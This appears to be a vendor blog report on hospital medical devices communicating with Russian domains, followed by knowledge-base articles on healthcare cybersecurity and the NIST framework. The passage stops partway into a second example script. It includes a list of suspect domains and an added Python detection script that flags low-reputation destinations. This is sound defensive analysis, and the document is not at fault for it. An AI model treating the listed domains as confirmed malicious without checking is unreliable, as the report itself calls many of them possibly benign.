Ordr’s continuous analysis of network data and the report highlighting communications to Russia is available to all Ordr customers, providing necessary details to help them understand and quickly respond to potential threats. We also wanted to share our insights beyond Ordr’s customers to help others understand the potential risk to their environment.
The threats uncovered below focus on medical devices; however, these threats are not limited to just medical devices or the healthcare industry. Attackers target connected devices in all industries, including manufacturing, financial services, retail, and utilities. Attacks not only target medical devices but also operational technology (OT) devices such as HVAC systems, elevator controls, and connected cameras that are common across all industries. Many of these devices are critical to business operations even if it seems there is no direct connection, and a successful breach could have a significant impact. For example, an attack that takes an HVAC system offline could create unsafe conditions in the emergency ward and hamper patient care.
Before getting into the details of our findings, here’s an extremely brief overview of how Ordr works and some of the details we uncover for each device:
Device Insights Provided by Ordr
Ordr analyzes data collected from multiple points in the network to discover every connected device. We also uncover details to accurately classify every device and identify devices with vulnerabilities and potential threats. Because we collect and analyze network data, we provide granular device insights without the need for agents or scanning, and with no impact on device operations.
Ordr insights help customers understand the exact devices connected in their environment, how those devices fit into the organization, and their potential risk. Ordr device details include:
- MAC Address – Important detail, but identifying a device by its MAC alone can be limiting and misleading.
- IP Address – Since IP addresses can change, Ordr provides a historical view of a device’s IP addresses.
- Operating System – Helps to identify devices running an outdated or unpatched OS.
- Device Profile – Includes the manufacturer and model.
- Device Group – How the organization has grouped the device and its role in the environment (e.g., medical, mobile, office equipment, facilities).
- Device Type – Details including exact model number and firmware version to understand specific threats that may impact the device.
- Device Category – The type of device (e.g., CT scanner, infusion pump, patient monitor).
- Device Location – The exact physical and network location, including the switch/port or access point/SSID the device connects to.
Communication Insights Provided by Ordr
Ordr also uncovers internal and external communication insights for each device by analyzing network data. This post focuses specifically on devices communicating with Russian sites, but the same insights can be used to identify communications with other restricted or high-risk countries. Ordr insights specific to devices communicating with external sites include:
- Destination IP – IP address of the site communicated with.
- Destination Domain Name – Domain name of the site communicated to.
- Destination City – Approximation of the site’s city. NOTE: Obfuscation techniques will impact accuracy (e.g., The Onion Router (Tor), VPN, etc.).
- URL – The complete URL of the communication.
- URL Category – Category of the site (e.g., gaming, shopping, advertising, government, military, etc.).
- Reputation score 1 – URL reputation derived from a leading threat feed.
- Reputation score 2 – URL reputation derived from another leading threat feed.
- Receive Bytes – Number of bytes received by devices from the site.
- Transmit Bytes – Number of bytes transmitted to the site from devices.
- Last Activity – Timestamp of the last activity from devices to or from the site.
- Incident Type – Classification of the destination site (e.g., malicious URL, SPAM URL, etc.).
- Incident Score – Determined by aggregating multiple factors of device communications.
- Aggregate Score – Determined by aggregating multiple factors of a device and its communications (e.g., vulnerabilities based on OS version, east-west communication analyzed using IDS signatures, external communication with malicious websites, etc.).
- Risk State – Overall assessment of device risk and potential impact to the organization (i.e., Critical, High, Medium, Low).
Ordr Analysis and Findings
For the insights that follow, the Ordr platform performed deep analysis on data aggregated and anonymized from 50 large health care chains, each consisting of multiple hospitals. The details below focus on medical devices used in healthcare settings such as infusion pumps, patient monitors, EEG/ECG, MRI/CT scanners, X-rays, ultrasounds, medical gateways, medical workstations running medical apps, medical servers used to process and store patient data, and other connected devices in the clinical setting delivering patient care. As mentioned previously, these threats are not limited to healthcare devices or the healthcare industry.
The goal of this analysis is to shed light on the potential threats so that organizations across all industries can be better prepared and take proper steps to secure their environments.
NOTE ON METHODOLOGY
- All data was aggregated and anonymized before analysis. None of the following details pertain to a specific customer, manufacturer, or device.
- Network Time Protocol (NTP) is a required service, and some devices may have legitimate reasons to communicate with Russian hosted NTP servers. Communications to Russian NTP sites have been removed from this analysis.
Top Russian Domains by Traffic
The first analysis highlights Russian domains that were identified for sustaining the highest levels of traffic into and out of the organizations we analyzed. While these domains may look somewhat benign, each may have the potential to be used to distribute malware or perform other malicious activities. Many of these sites are known to generate intrusive online ads and collect personal information. Device communications to any of these domains should be scrutinized to determine if communication is required and expected.
- *.yandex.ru
- *.ssp.rambler.ru
- ssp.adriver.ru
- sm.rtb.mts.ru
- *.rutarget.ru
- counter.yadro.ru
Devices Communicating with the Largest Number of URLs
The next analysis identifies device types that have communications with the largest number of Russian URLs. Many of these devices perform critical functions in healthcare environments and we can infer these types of devices are top targets for attackers.
Devices Communicating with the Smallest Number of URLs
The following medical device types have communications with the smallest number of Russian URLs compared to the devices listed above. Like the devices above, many of these devices provide critical functions in healthcare environments, and although they communicate with fewer Russian URLs, this activity should still be scrutinized to determine if communications are required and expected.
- Video Digitizer Recorder
- Coagulation Meter
- Perimetry System
- Blood Gas Analyzer
- Radio Fluoroscopy
- Surgical System
- X-ray Volume Imaging
- MR Image Analysis System
- Mobile X-ray System
- Molecular Diagnostics System
- ECG
- Anesthesia Cart
- Hematology Analyzer
- Digital Radiography System
- EEG
- PET/CT System
- Computed Tomography
- PET Scanner
- Patient Monitoring
- Mammography
- MRI Analyzer
- Dental X-ray System
- X-ray System
- SPECT System
Devices with the Most Received Data on a per Device Basis
Focusing our analysis on individual devices, the following details highlight the device types with the largest amount of data received from Russian sites per device. Even if outbound communication is blocked by a firewall, the fact that these devices are receiving this volume of data from Russian sites should be of concern, and communication should be scrutinized to determine if communications are required and expected.
Device category (received bytes per device):
- CT Scanner (700K)
- Infusion Pump (160K)
- Medical Workstations (95K)
- X-Ray (47K)
- CT Scanner (21K)
- Hematology (19K)
- PACS (22K)
- Radiotherapy (7K)
- Ultrasound (5K)
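As an added example (not Ordr's code), the following script applies the analysis steps described in this post to constructed flow records that carry the communication-insight fields listed earlier: it drops NTP traffic as the methodology note requires, matches destinations against the top-domain list, counts distinct domains and received bytes per device by category, and flags flows whose reputation score is very low. The record layout, the port-based NTP check and the 0-100 reputation scale are assumptions, not Ordr's export format.

```python
from collections import defaultdict
from dataclasses import dataclass
from fnmatch import fnmatch
from typing import Optional

# Domains from the "Top Russian Domains by Traffic" list in this post. A leading
# "*." matches any subdomain; fnmatch anchors the pattern to the whole name, so
# "mc.yandex.ru" matches "*.yandex.ru" while "yandex.ru.example.com" does not.
TOP_DOMAINS = ["*.yandex.ru", "*.ssp.rambler.ru", "ssp.adriver.ru",
               "sm.rtb.mts.ru", "*.rutarget.ru", "counter.yadro.ru"]

NTP_PORT = 123          # methodology note: NTP traffic is left out of the analysis
SUSPICIOUS_SCORE = 10   # post: a reputation score around 10 is very suspicious


@dataclass(frozen=True)
class Flow:
    """One external-communication record using the field names listed in the
    post. The record shape and the 0-100 score scale (lower = worse) are
    assumptions for this example."""
    device_id: str
    device_category: str
    destination_domain: str
    destination_port: int
    url_category: str
    reputation_score_1: int
    reputation_score_2: int
    receive_bytes: int
    transmit_bytes: int


def matches_top_domain(domain: str) -> Optional[str]:
    """Return the TOP_DOMAINS pattern the destination matches, or None."""
    name = domain.lower().rstrip(".")
    for pattern in TOP_DOMAINS:
        if fnmatch(name, pattern):
            return pattern
    return None


def analysis_set(flows):
    """Apply the methodology note: drop NTP flows before any aggregation."""
    return [f for f in flows if f.destination_port != NTP_PORT]


def received_bytes_per_device(flows):
    """Received bytes per device category, divided by the number of distinct
    devices in that category (the post's "received bytes per device")."""
    total = defaultdict(int)
    devices = defaultdict(set)
    for f in analysis_set(flows):
        total[f.device_category] += f.receive_bytes
        devices[f.device_category].add(f.device_id)
    return {cat: total[cat] // len(devices[cat]) for cat in total}


def distinct_domains_per_category(flows):
    """Number of distinct destination domains each device category reaches."""
    seen = defaultdict(set)
    for f in analysis_set(flows):
        seen[f.device_category].add(f.destination_domain.lower())
    return {cat: len(domains) for cat, domains in seen.items()}


def traffic_by_top_domain(flows):
    """Total bytes in both directions per matched TOP_DOMAINS pattern."""
    totals = defaultdict(int)
    for f in analysis_set(flows):
        pattern = matches_top_domain(f.destination_domain)
        if pattern:
            totals[pattern] += f.receive_bytes + f.transmit_bytes
    return dict(totals)


def suspicious_flows(flows, threshold=SUSPICIOUS_SCORE):
    """Flows whose worse reputation score is at or below the threshold: the
    ones to scrutinise first, since the post associates such sites with C&C."""
    out = []
    for f in analysis_set(flows):
        worst = min(f.reputation_score_1, f.reputation_score_2)
        if worst <= threshold:
            out.append((f.device_id, f.device_category, f.destination_domain, worst))
    return out


# Constructed sample records: device ids, hostnames, scores and byte counts
# are invented for this example and do not describe any real customer.
SAMPLE_FLOWS = [
    Flow("ct-01", "CT Scanner", "mc.yandex.ru", 443, "advertising", 55, 60, 400_000, 12_000),
    Flow("ct-02", "CT Scanner", "ssp.adriver.ru", 443, "advertising", 40, 45, 300_000, 8_000),
    Flow("pump-01", "Infusion Pump", "counter.yadro.ru", 80, "advertising", 8, 12, 160_000, 2_000),
    Flow("pump-01", "Infusion Pump", "ntp1.example.ru", 123, "infrastructure", 70, 75, 5_000, 5_000),
    Flow("ws-01", "Medical Workstation", "sm.rtb.mts.ru", 443, "advertising", 50, 48, 95_000, 30_000),
    Flow("ws-02", "Medical Workstation", "news.example.ru", 443, "news", 65, 70, 20_000, 1_000),
]

if __name__ == "__main__":
    print("received bytes per device:", received_bytes_per_device(SAMPLE_FLOWS))
    print("distinct domains:", distinct_domains_per_category(SAMPLE_FLOWS))
    print("traffic by top domain:", traffic_by_top_domain(SAMPLE_FLOWS))
    print("suspicious flows:", suspicious_flows(SAMPLE_FLOWS))
```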
Device Categories with the Most Received Data
Since a single organization may have multiple units of each device, we aggregated and analyzed device data to highlight the device categories with the largest amount of data received from Russian sites. As with the other categories, these devices provide critical functions in healthcare environments.
- EEG Workstation
- Ultrasound Image Management
- Infusion Pump
- Glucose Monitor
- Medical Workstation
- EHR Workstation
- PACS Workstation
Device Categories with the Most Transmitted Data
Since a single organization may have multiple units of each device, we aggregated and analyzed device data to highlight the device categories with the largest amount of data transmitted to Russian sites. These devices provide critical functions in healthcare environments and also appear in the list above of device categories receiving the most data from Russian sites.
- Ultrasound Image Management
- EHR Workstation
- Medical Workstation
- PACS Workstation
- EEG Workstation
- Infusion Pump
Categories of Sites Communicating the Most with Medical Devices
Looking at the types of Russian sites communicating with the devices in the data we analyzed, the following shows the distribution of site categories communicating with medical devices. As with the Top Russian Domains by Traffic analysis above, many of these categories may look benign; however, each may have the potential to be used to distribute malware or perform other malicious activities.
Device Types and Reputation Score of Sites
Looking at the reputation score of destination URLs, the following chart highlights device types and the reputation of the Russian sites they communicate with. Sites with a low reputation score (e.g., 10) are determined to be very suspicious with a high probability of being malicious. As an example, these sites could host a Command and Control (C&C) server and a connection could be used to download malware such as ransomware to a device and orchestrate the spread across an environment.
Malicious Russian Site Example
The site counter.yadro.ru is a known malicious advertising site that has been reported several times in the past for distributing malware. The following device types analyzed had frequent transactions with this site.
- Patient Monitor
- PACS Workstation
- EEG Workstation
- Blood Analyzer
Here is a list of the offenders by device type with the number of URLs they are reaching out to.
Cities With the Most Communications
The following analysis highlights the top Russian cities with the most traffic to and from the devices we analyzed. Since attackers commonly use techniques to obscure their details, it is not always easy to determine the exact location of malicious activity. However, by analyzing the site IP address, it can be possible to provide insight and an approximation of the potential location.
Protecting Your Environment
Identifying potentially malicious activity and understanding risk is a critical first step to protecting any environment. Ordr customers regularly generate and review their detailed reports showing devices in their environment that have communicated with Russian sites. That report not only identifies these communications but also provides detailed analysis to help customers understand and address the potential risk in their environments.
Ordr also helps customers eliminate risk by dynamically generating policies for enforcement across their existing security and network infrastructure. Ordr has integrations with leading firewall vendors and can automatically push policies to limit the sites with which devices are allowed to communicate, for example to manufacturer maintenance, software update, and image-enhancement services for medical imaging.
If a device is already infected and spreading malware, Ordr can quickly push policies to switches or wireless controllers to isolate them and stop the spread of the attack. Ordr can also push proactive zero-trust policies to switches or wireless controllers, allowing only a pre-determined set of devices and flows to and from any medical device.
If you want to learn more about the Ordr solution, the insights we provide to uncover the risk of Russian communications, and how you can improve the security for your connected devices, reach out for a personalized demo.
Knowledge Base
What is Healthcare Cybersecurity?
10 Min Read
The healthcare industry relies on connected devices to deliver patient care and power hospital operations. These devices, from infusion pumps and MRIs to video cameras and HVAC systems, need to be protected from cyberattacks such as ransomware. Additionally, these devices may hold protected healthcare information (PHI) that needs to be secured.
In order to ensure patient safety and protect all of these devices from abuse and attack, healthcare organizations need a whole hospital cybersecurity strategy. A whole hospital healthcare cybersecurity strategy ensures that every connected medical device and any device that includes data that qualifies as Protected Healthcare Information (PHI) or Personally Identifiable Information (PII) is secured.
As this article explains, the proliferation of connected devices makes it challenging to develop healthcare cybersecurity strategies that address all security requirements related to PHI and can protect them against attacks to ensure patient safety. But with the right tools and methodologies, organizations can overcome these challenges to ensure they meet, or even better surpass, the minimal data security and privacy mandates that apply to PHI and PII in healthcare.
What is healthcare cybersecurity?
Healthcare cybersecurity measures are the tools and strategies that healthcare organizations use to ensure patient safety and maintain the privacy of sensitive healthcare data. Healthcare cybersecurity ensures that sensitive healthcare data stays restricted, and can only be accessed by parties like a patient’s doctor.
Healthcare cybersecurity protects healthcare organizations from external threats, like ransomware or hackers seeking to steal sensitive personal information to sell on the Dark Web. It also safeguards information against internal threats: these include malicious internal actors like disgruntled employees of a hospital, as well as users who inadvertently place sensitive information at risk. For example, hospital employees who fall prey to phishing schemes could risk hackers gaining access to sensitive patient information.
To deliver complete protection against data security risks, healthcare cybersecurity must be able to enforce data protection requirements over any and all systems used by medical organizations. For example, in a hospital, healthcare cybersecurity tools typically need to protect the following:
- Prescribing systems, which hospital doctors use to generate and manage prescriptions.
- Practice management support systems, which store patient healthcare information.
- Clinical decision support systems, where doctors manage information related to patient care.
- Radiology information systems, which store medical images and radiology data associated with individual patients.
- Internet of Medical Things devices, such as infusion pumps and remote patient monitoring devices, which collect healthcare data from individuals.
- Operational Technology devices, such as HVAC systems and elevator control infrastructure, which could impact hospital operations, delay medical procedures, or put patient safety at risk if compromised.
- Internet of Things devices such as smart speakers and smart screens, which may also collect data that can be associated with individual patients. Plus, attackers may use these devices as an initial threat vector, and use lateral movement to move deeper into a network.
These connected devices are critical to patient safety or empowering hospital operations, have the potential to generate and store PHI or PII, and must be protected against cyber attacks and data exfiltration risks.
In addition to securing diverse types of systems, healthcare cybersecurity must address the needs of multiple stakeholders. Hospital staff members must understand healthcare cybersecurity policies and resources to ensure they manage sensitive data responsibly, and keep abreast of constantly evolving cyber threats. For example, HTM and biomedical teams can leverage insights from healthcare cybersecurity tools to help with their day to day tasks, such as locating medical devices, identifying those with vulnerabilities, and taking advantage of utilization details to better plan patching and maintenance work.
Vendors who supply digital services and resources to healthcare organizations, too, have a role to play in healthcare cybersecurity. They are responsible for following robust cybersecurity practices to protect data that is stored or managed within their systems and devices. The same is true of healthcare security and IT teams, who play the leading role in hardening IT systems that store PHI or PII, as well as in identifying and responding to cybersecurity attacks.
To understand what healthcare cybersecurity looks like in practice across various contexts, let’s look at a few common examples of specific systems and devices that healthcare cybersecurity strategies typically need to cover.
Email
Although you may not think of email as a type of sensitive medical data storage system, the reality is that email inboxes store information like patient data. For that reason, email must be secured in order to meet mandates related to PHI and PII security.
In addition, email can be an attack vector for hackers who distribute malware or execute phishing campaigns via email. For that reason, it’s critical to secure email systems as part of healthcare cybersecurity in order to prevent the theft of private data.
Medical Devices
It’s common for hospitals and doctors’ offices to use a variety of medical devices to deliver healthcare. For example, nurses may use medical PC stations to keep track of patient records, or doctors might carry tablets to issue prescriptions.
If malicious actors gain physical access to these devices, they could access sensitive data stored within them or gain unauthorized access to other systems and data in the organization. They may even plant malware to carry out remote attacks later. Healthcare cybersecurity solutions must protect these devices against both types of threats.
Connected IoT devices
In addition to traditional IT devices, a wide variety of connected or smart devices are used across healthcare organizations, like Internet-controlled HVAC sensors and elevator controllers. If these devices aren’t properly monitored, secured, and patched as part of a healthcare cybersecurity strategy, they will be compromised.
Legacy systems
A legacy system is any type of system that is no longer supported by its manufacturer, but that is still in use: for example, an operating system that has reached its “end of life” date or an application whose vendor has gone out of business. Updating healthcare technology tends to be a complicated and expensive process. This means that healthcare organizations frequently depend on legacy systems until they find the time or resources to migrate to newer ones.
Legacy systems are vulnerable to attack because they no longer receive security updates or patches. Documentation about maintaining the systems is typically out of date.
Nonetheless, to protect against all potential cyber threats, healthcare cybersecurity tools must be able to protect data stored in legacy systems, even if support from the systems’ developers is no longer available.
Healthcare cybersecurity threats
For healthcare organizations today, it’s not a question of if they will face cyber attacks, but when. Breaches and attempted breaches against healthcare organizations are at an all-time high. That’s largely due to the fact that healthcare data presents such alluring targets for hackers, who encrypt sensitive data and hold it hostage for exorbitant ransoms.
Attackers use a variety of techniques in their efforts to access prized healthcare information. Some of these techniques include:
Malware
Malware is malicious software that gives attackers unauthorized access to systems or information stored on them. Malware enables threat actors to steal credentials, collect data, or gain control of systems in order to move laterally or cause disruption to services.
Ransomware
Ransomware is a special type of malware designed to encrypt data, rendering it unusable to the organization that owns it. After encryption occurs, attackers demand a ransom from the organization in order to decrypt the victim’s files. Unless the targeted organization has proper backups in place, it’s forced to choose between paying the ransom or suffering a major disruption to its operations.
Phishing
Phishing is a cyber attack technique in which threat actors trick users into sharing sensitive information. For instance, they might send emails impersonating IT staff or with malicious links to convince employees to share usernames and passwords. If the phishing attack succeeds, the hackers can then use the sensitive data to gain unauthorized access to systems and exfiltrate data, plant malware, or execute ransomware attacks.
Data exposure
Data exposure occurs when lost laptops, insecure physical systems, or IT breaches make sensitive information accessible to unauthorized parties. Data exposure is not an attack, per se, because it’s not the result of malicious activity by hackers. But the end result, the exposure of sensitive information, is the same as it would be in the case of conventional cyber attacks.
Insider threats
Insiders, like hospital staff, have legitimate access to various systems. If employees intentionally or accidentally misuse those systems, they place sensitive data at risk. This is especially true if the systems are configured with excess permissions that grant internal users more access than they need.
System vulnerabilities
Unpatched software, out-of-date software, recalled devices, and banned devices could be subject to system vulnerabilities. Information about vulnerabilities is often published in public databases, recall information is available from manufacturers, and lists of banned devices are available from organizations such as the FDA. Hackers can easily find and exploit these known vulnerabilities and vulnerable devices to plant malware or gain access to vulnerable systems, placing the entire organization at risk.
Healthcare cybersecurity best practices
Although every healthcare organization’s security risks and requirements are different, there are healthcare cybersecurity best practices that every healthcare organization should follow to mitigate the risk to patient safety and of the misuse of PHI and PII.
Achieve visibility
You can’t protect what you can’t see. For that reason, maintaining comprehensive and continuously up-to-date visibility across the whole hospital is the first step in healthcare cybersecurity.
Comprehensive visibility means knowing about all assets that are connected to your organization’s network, the services those assets provide, the data those devices collect, manage or access, and which security safeguards are (or aren’t) in place to protect the devices. Visibility also ensures that you are aware of vulnerabilities that place devices, services, and data at risk. This way, you have a complete view of the attack surface and can assess for vulnerabilities and potential risks and monitor for threats.
Perform risk assessments
Risk assessments are systematic evaluations of healthcare cybersecurity vulnerabilities and threats that exist and the level of risk each one poses. Risk assessments may also be used to document measures that organizations have taken to prevent breaches.
Healthcare organizations should perform risk assessments on a regular basis, at least once a year if not more often, as part of their security strategy; assessments may also be required to meet compliance requirements or to obtain cyber insurance. Risk assessment procedures should be updated whenever new devices or services are deployed.
Implement security controls
Security controls, meaning tools and procedures that organizations use to harden systems against attack, go a long way toward minimizing healthcare cybersecurity risks. Foundational security control measures include tools such as antivirus software, which can help to prevent malware attacks. Data backup and restoration platforms recover compromised data following a ransomware breach. Data encryption, network firewalls, incident response planning, and multi-factor authentication also help to establish baseline security defenses for healthcare systems.
Connected device security tools and solutions, such as Ordr, are also critical to discover and classify every device in healthcare systems, inspect East-West traffic for malware or communications to a malicious domain, and identify vulnerabilities within devices. In particular, these connected device security tools must be designed to operate safely in a healthcare environment; for example, the discovery and vulnerability identification process cannot impact sensitive medical device operations. Therefore, these tools must offer an “agentless, passive” approach to security.
Zero Trust
Many modern healthcare organizations have adopted Zero Trust as a core cybersecurity strategy. With Zero Trust the minimum necessary permissions are put in place to control access to healthcare systems and data and reduce risk. Zero Trust principles can be applied to users, devices, data assets, and services in order to restrict communication and mitigate the risk of abuse.
An example of Zero Trust is the use of network access control (NAC) to control device and user access to the network and services. Another example is network segmentation, sometimes referred to as microsegmentation, a technique that isolates devices on the network and prevents unnecessary communications.
Educate staff
Education such as cybersecurity awareness training ensures that healthcare workers are aware of risk and follow best practices to protect patients, services, and data. Healthcare staff should know how to spot threats, like phishing emails, and to react appropriately. They must also be aware of the risks posed by both external and internal threats.
Staff education is also a means of spreading awareness of legal requirements related to healthcare cybersecurity, such as those imposed by HIPAA, so that workers can do their part to adhere to compliance rules.
Healthcare cybersecurity laws and regulations
HIPAA, or the Health Insurance Portability and Accountability Act, is the best-known of several laws and regulations that governing bodies created to enforce healthcare cybersecurity best practices. Although complying with these mandates is not the only reason why healthcare organizations should protect sensitive data, it's often a core motivator. This means that familiarity with healthcare laws and regulations is an important component of healthcare cybersecurity.
HIPAA contains several provisions that impact the security of healthcare data. One, known as the Privacy Rule and defined in 45 CFR Part 160 and Subparts A and E of Part 164, establishes permitted and required uses and disclosures of PHI. It also deems PHI to be individually identifiable, and therefore subject to specific security requirements.
In addition, 45 CFR Part 160 and Part 164, Subparts A and C set forth specific security requirements related to PHI that are stored electronically, since most healthcare data is stored this way today. These requirements are referred to as the HIPAA Security Rule. Finally, HIPAA imposes (in 45 CFR §§ 164.400-414) a Breach Notification Rule that generally requires organizations to notify affected users in the event of a cybersecurity breach involving PHI.
Beyond HIPAA, other legal regulations may apply to healthcare data. For example, 42 CFR Part 2 is a law that protects patient records created by programs that receive federal funding to treat substance use disorders. It establishes very specific and extensive privacy requirements related to PHI in this context.
Additionally, the National Institute of Standards and Technology's (NIST) Cybersecurity Framework provides guidance, guidelines, and practices for organizations to reduce their cybersecurity risk. Developed in 2014 and updated in 2018, the framework also helps organizations and businesses better manage risk and cybersecurity communications. Overall, the NIST framework gives organizations a common language and systematic methodology for risk management.
The framework itself is made up of three components: the Core, Tiers, and Profiles. The Core helps organizations manage and reduce risks in a way that complements their current cybersecurity practices. Profiles allow organizations to identify areas where existing processes can be optimized and new processes can be implemented. Finally, the Tiers ask organizations to consider how strictly their cybersecurity program will comply with NIST standards.
Likewise, the HHS 405(d) Health Industry Cybersecurity Practices (HICP), which is integrated into the NIST framework, lays out specific guidelines for healthcare cybersecurity standards. According to the HHS, the top threats for cybersecurity are:
- Email phishing
- Ransomware attacks
- Loss or theft of equipment
- Accidental or intentional data loss
- Connected medical device attacks that impact patient safety
Both the NIST framework and the HHS 405(d) operate to protect healthcare agencies and patients.
Protect Your Whole Hospital
Healthcare cybersecurity threats come in many forms and apply to a wide variety of systems. For that reason, healthcare organizations should establish a comprehensive cybersecurity strategy with protections that defend all of their assets against all types of attacks, risks, and threats: conventional IT systems, Internet of Medical Things devices, unsupported legacy systems, connected facilities devices, Internet of Things devices, and beyond. Organizations must also maintain comprehensive visibility across the entire organization, including high-risk assets and whether they are secure. And they must be aware of specific regulatory mandates and implement the protections necessary to comply.
Ordr can help with a whole hospital approach to healthcare cybersecurity. By automatically discovering and accurately classifying all connected devices that healthcare organizations depend on, we maintain a continuously updated inventory to provide comprehensive visibility into healthcare systems, vulnerabilities, and risk. In addition, Ordr can help organizations enforce healthcare cybersecurity best practices based on Zero Trust principles, helping organizations protect critical data and services, meet strict compliance and data privacy mandates, and ultimately ensure patient safety.
Knowledge Base
An Inside Look at the NIST Cybersecurity Framework
9 Min Read
Cybersecurity attacks are an ever-present concern, a hydra that spawns new heads after each known head is vanquished. One of those newly spawned nightmares is trying to protect Internet of Things (IoT), Internet of Medical Things (IoMT), and Operational Technology (OT) devices as they become network enabled and part of the bigger cybersecurity picture. This is something that traditional cybersecurity tools aren't built to handle.
These devices are used in many industries: healthcare, financial services, transportation, manufacturing, and education, just to name a few. IoT, IoMT, and OT devices, as well as traditional systems and resources, must be protected by a thorough plan. The National Institute of Standards and Technology Cybersecurity Framework (NIST CSF) helps your organization build a solution customized to fit your business and needs.
What is the NIST Cybersecurity Framework?
The NIST Cybersecurity Framework is a technology neutral security structure built upon cutting-edge global standards, existing guidelines, and developed practices that is capable of evolving to meet business requirements and keep up with technological advancement. The NIST Cybersecurity Framework is intended as a complement to an organization's existing cybersecurity strategy and risk management plan. It provides the means to continue with current policies and procedures, while also discovering areas of potential improvement, better means of communication, and/or increased industry alignment.
The NIST Cybersecurity Framework Core can be used by any sector with any infrastructure because it is adaptable, flexible, and based on business-driven implementation. The NIST Cybersecurity Framework is a top-ranked structural foundation on which a company can build the cybersecurity program best suited to their unique business profile.
The Core breaks the controls and practices into five service lanes to be addressed concurrently:
- Identify (ID)
- Protect (PR)
- Detect (DE)
- Respond (RS)
- Recover (RC)
Importance of the NIST Cybersecurity Framework
The NIST Cybersecurity Framework is built upon tried-and-true practices, so you can apply proven solutions to real problems by leveraging the framework for guidance. It enhances compliance with industry standards and regulations, as well as helps mitigate vulnerabilities by exposing previously unseen risk.
The framework also aids with zeroing in on a company's true risks, increasing both efficiency and resource management. In addition, the NIST Cybersecurity Framework (CSF) refines asset management to ensure the company maintains accurate inventory.
While security teams understand the threat landscape and cybersecurity needs, stakeholders and other company teams don't have this detailed understanding. NIST CSF bridges the gap between IT and business departments by laying a reasonable path that focuses on specific outcomes. The framework enhances conversations with these groups and helps explain why certain actions and resources are necessary to achieve a fully mature cybersecurity solution.
The five core functions of the NIST Cybersecurity Framework allow for a company to start at any point. Whether your company is using cutting edge cybertech or relying on legacy systems, there are benefits to be reaped by employing the framework.
When applying NIST CSF, a practitioner should leverage the framework against a control set outlined by the NIST publication they are attempting to adhere to. For example, 800-53 rev5 (Security and Privacy Controls for Information Systems and Organizations) is often used as the core set of standards for healthcare organizations, as it helps in the protection of personally identifiable information (PII). The control spreadsheet outlines a list of controls or control enhancements described in the control text column (that is to say, "do I have this control?"). Often controls are satisfied by technologies you have or need to have in your environment. A solution such as Ordr could help meet the requirements of CM-8 (System Component Inventory) and satisfy PM-5 (System Inventory) requirements. These controls speak directly to the framework.
Let's take an example for 800-53 mapped to the CSF for ID.AM-1: Physical devices and systems within the organization are inventoried. To satisfy this functional category and subcategory you need controls CM-8 and PM-5. As you see, to satisfy the CSF you need to first decide what publication you would like to adhere to. 800-53 is popular but others may be relevant to your organization and contain similar control maps.
The NIST Cybersecurity Framework Core Elements
The Core framework divides security activities into five high-level functions that include Identify, Protect, Detect, Respond, and Recover. As a whole, these functions provide a company with the means of managing risks by organizing all pertinent information, addressing potential threats, and continuously learning from previous ventures.
1. Identify (ID)
Identify is the NIST Cybersecurity Framework function that brings together business context, critical support functions and resources, and risk management. The goal of Identify is to define the critical business landscape for your organization so adequate protection can be implemented around it. Organizations should also consider all processes, procedures, and policies that revolve around the organization's compliance regulation, legal considerations, risk factors, operational requirements, and environment.
This includes the following recommended tasks:
- Establish Asset Management policies and procedures, and identify all physical devices, systems, software platforms, and applications that are IT assets, including their criticality where possible.
- Establish an organization-wide security policy, and address cybersecurity issues/risks via governance and risk management policies and procedures.
- Determine the legal requirements and regulations to be enforced, including privacy requirements or civil liberties, and develop a method for the management of such.
- Identify and document any asset vulnerabilities, and utilize vulnerability and threat information available from information sharing forums and sources.
- Determine and document potential threats from both internal and external threat actors and evaluate threats, vulnerabilities, probabilities, and impacts to determine risks.
- Identify how the organization supports the business environment, including any supply chain roles or critical infrastructure implications.
- Identify constraints, priorities, assumptions, and risk tolerances to develop a supply chain risk management strategy.
Your organization should employ a platform that allows for passive discovery with in-depth details, agentless software tracking, and data flow monitoring. Ideally, this includes support of connected devices such as IoT, IoMT, and OT devices. This platform will be capable of providing relevant information to assist the risk management process, such as risk scores per device. The platform also should be able to identify and manage devices and/or communications that involve regulated data, such as payment card industry (PCI) data or medical information protected by HIPAA such as protected health information (PHI).
Consider a solution that can monitor incidents and risk for both traditional devices and IoT devices. The solution should be able to detect anomalies and network intrusions, as well as bad URL/site connections, with detailed trend analysis. A platform such as Ordr also provides a risk score to assist with prioritization, and should be capable of both scheduled and ad-hoc reporting.
2. Protect (PR)
The Protect function is about safeguarding to prevent, limit, or contain any impacts from potential cybersecurity incidents. It's a crucial piece of ensuring the continued delivery of vital services.
This includes the following tasks:
- Manage both credentials and identities for authorized users and devices.
- Manage remote access.
- Use separation of duties and the principle of least privilege to help develop a robust method of access management.
- Protect network integrity, including network segregation where warranted.
- Protect data-at-rest.
- Formally manage assets in the transfer, removal, and disposition stages.
- Implement protections against data leaks.
- Keep the production environment separate from testing and development environments.
- Create and maintain a baseline configuration of IT/OT control systems.
- Implement a system development life cycle (SDLC) to manage systems.
- Develop and implement a vulnerability management plan.
- Control access to assets and systems while keeping in mind the least functionality principle.
- Protect communications and control networks.
A key piece of implementing Protective Technology is using a system that can restrict access to IoT and OT devices. Ordr's offering is capable of tracking said devices and the communication patterns of each system.
A good solution should employ artificial intelligence (AI) that can establish baseline communication behavior and transform the baseline into security policies that are device specific, such as limiting traffic to only approved systems to reduce the IoT/IoMT/OT attack surface. As an example, microsegmentation policy can be created to limit IoT/IoMT/OT device communications such as restricting external communications as well as communications with internal systems not required for normal operations. A security platform such as Ordr can continuously monitor all communication and detect devices trying to connect to malicious sites, unauthorized networks, or receive malicious communications. Such a solution also provides domain separation between environments by creating and enforcing microsegmentation policy. Choose a solution that can track an asset's SDLC as it relates to cybersecurity.
Another capability to look for in a solution is the ability to integrate security intel feeds as well as integration with a vulnerability management platform. Security intel feeds provide insights into known vulnerabilities and associated risk with the ability to identify impact to your environment. Vulnerability management capabilities will help to ensure that remediation and mitigation tasks can be coordinated and tracked across teams as you look to reduce or eliminate risk. Ordr's offering is capable of integrating security intel feed data to identify connected devices with known vulnerabilities. The solution also provides native vulnerability management capabilities as well as the ability to integrate with other third-party vulnerability management tools.
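To make the Identify tasks above concrete (passive, agentless inventory; per-device risk scores; flagging devices that handle regulated data) together with the vulnerability-feed matching just described, here is an added example in Python. It is not Ordr's code or any project's implementation: the DHCP records, flow records, hostname classification rules, vendor classes and the vulnerability feed (with placeholder IDs, not real CVE numbers) are all constructed for the example, and the scoring formula is an assumption, not Ordr's risk score.

```python
"""Passive, agentless asset inventory with risk scoring (added example, not Ordr's code)."""
from dataclasses import dataclass, field

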